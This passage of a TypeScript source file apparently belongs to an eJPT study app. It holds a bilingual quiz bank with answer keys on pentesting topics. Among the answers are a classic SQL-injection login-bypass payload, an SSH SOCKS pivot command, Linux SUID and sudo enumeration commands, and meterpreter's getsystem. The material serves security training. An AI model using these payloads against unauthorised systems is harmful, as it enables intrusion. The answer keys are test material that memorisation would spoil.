    promptEn: "Write a classic SQLi payload to bypass a login form in the username field.",
    promptEs: "Escribe un payload SQLi clásico para hacer bypass de un login en el campo usuario.",
    correctAnswer: "admin' OR '1'='1' -- -",
    explanationEs: "Esto convierte la condición WHERE en siempre verdadera, evadiendo la validación de password.",
  },

  // ---------------- Semana 7: Network attacks / Pivoting ----------------
  {
    id: "q-mitm-1", subtopicId: "net-mitm", type: "single", globalWeek: 7,
    promptEn: "What does ARP spoofing achieve?",
    promptEs: "¿Qué logra el ARP spoofing?",
    options: [
      "Cifra el tráfico de red",
      "Hace que la víctima crea que el atacante es el gateway (o viceversa), permitiendo interceptar tráfico",
      "Escanea puertos abiertos",
      "Reinicia el router",
    ], correctAnswer: "1",
    explanationEs: "ARP spoofing envenena la tabla ARP para posicionar al atacante en medio del tráfico (MITM).",
  },
  {
    id: "q-pivot-1", subtopicId: "net-pivoting", type: "command", globalWeek: 7,
    promptEn: "Write the SSH command to create a dynamic SOCKS proxy on local port 1080 through host 'user@10.10.10.5'.",
    promptEs: "Escribe el comando SSH para crear un proxy SOCKS dinámico en el puerto local 1080 a través del host 'user@10.10.10.5'.",
    correctAnswer: "ssh -D 1080 user@10.10.10.5",
    explanationEs: "-D crea un proxy SOCKS dinámico que luego se usa con proxychains.",
  },

  // ---------------- Semana 8: Privesc ----------------
  {
    id: "q-privesc-lin-1", subtopicId: "privesc-linux", type: "command", globalWeek: 8,
    promptEn: "Write the command to check what you can run with sudo without a password.",
    promptEs: "Escribe el comando para ver qué puedes ejecutar con sudo sin contraseña.",
    correctAnswer: "sudo -l",
    explanationEs: "sudo -l lista los comandos permitidos para el usuario actual vía sudoers.",
  },
  {
    id: "q-privesc-lin-2", subtopicId: "privesc-linux", type: "command", globalWeek: 8,
    promptEn: "Write the find command to list all SUID binaries on the system.",
    promptEs: "Escribe el comando find para listar todos los binarios con bit SUID.",
    correctAnswer: "find / -perm -4000 -type f 2>/dev/null",
    explanationEs: "-perm -4000 filtra archivos con el bit SUID activo.",
  },
  {
    id: "q-privesc-win-1", subtopicId: "privesc-windows", type: "command", globalWeek: 8,
    promptEn: "Inside meterpreter, write the command to attempt automatic privilege escalation.",
    promptEs: "Dentro de meterpreter, escribe el comando para intentar escalada de privilegios automática.",
    correctAnswer: "getsystem",
    explanationEs: "getsystem prueba varias técnicas conocidas de escalada automática en Windows.",
  },

  // ---------------- Semana 9+: Full chain / Reporting / Exam ----------------
  {
    id: "q-fullchain-1", subtopicId: "full-chain", type: "single", globalWeek: 9,
    promptEn: "What is the correct general order of a penetration test methodology?",
    promptEs: "¿Cuál es el orden general correcto de una metodología de pentesting?",
    options: [
      "Explotación -> Recon -> Enumeración -> Reporte",
      "Recon -> Escaneo/Enumeración -> Evaluación de vulnerabilidades -> Explotación -> Post-explotación -> Reporte",
      "Post-explotación -> Recon -> Explotación",
      "Reporte -> Recon -> Explotación",
    ], correctAnswer: "1",
    explanationEs: "El flujo estándar (y el que sigue eJPT) es: recon, escaneo/enumeración, evaluación de vulnerabilidades, explotación, post-explotación, reporte.",
  },
  {
    id: "q-report-1", subtopicId: "reporting", type: "single", globalWeek: 10,
    promptEn: "What format does the eJPT exam mainly expect for answers?",
    promptEs: "¿Qué formato espera principalmente el examen eJPT para las respuestas?",
    options: ["Ensayo narrativo largo", "Respuestas cortas y precisas tipo pregunta-respuesta (flags/valores exactos)", "Solo capturas de pantalla", "No requiere respuestas, solo acceso root"], correctAnswer: "1",
    explanationEs: "El eJPT usa un cuestionario de preguntas específicas con respuestas cortas (versiones, hashes, flags), no un reporte narrativo largo como OSCP.",
  },
  {
    id: "q-examlogistics-1", subtopicId: "exam-logistics", type: "single", globalWeek: 11,
    promptEn: "What should you verify BEFORE exam day, not on the exam day itself?",
    promptEs: "¿Qué deberías verificar ANTES del día del examen, no el mismo día?",
    options: ["Nada, todo se hace el mismo día", "La conexión VPN del examen y tu entorno Kali", "El clima", "El nombre del certificado"], correctAnswer: "1",
    explanationEs: "Probar la VPN y el entorno con anticipación evita perder tiempo valioso del examen resolviendo problemas técnicos.",
  },
];

export function questionsForSubtopic(subtopicId: string): QuizQuestion[] {
  return QUIZ_BANK.filter((q) => q.subtopicId === subtopicId);
}

export function questionsAvailableAtWeek(globalWeek: number): QuizQuestion[] {
  return QUIZ_BANK.filter((q) => q.globalWeek <= globalWeek);
}
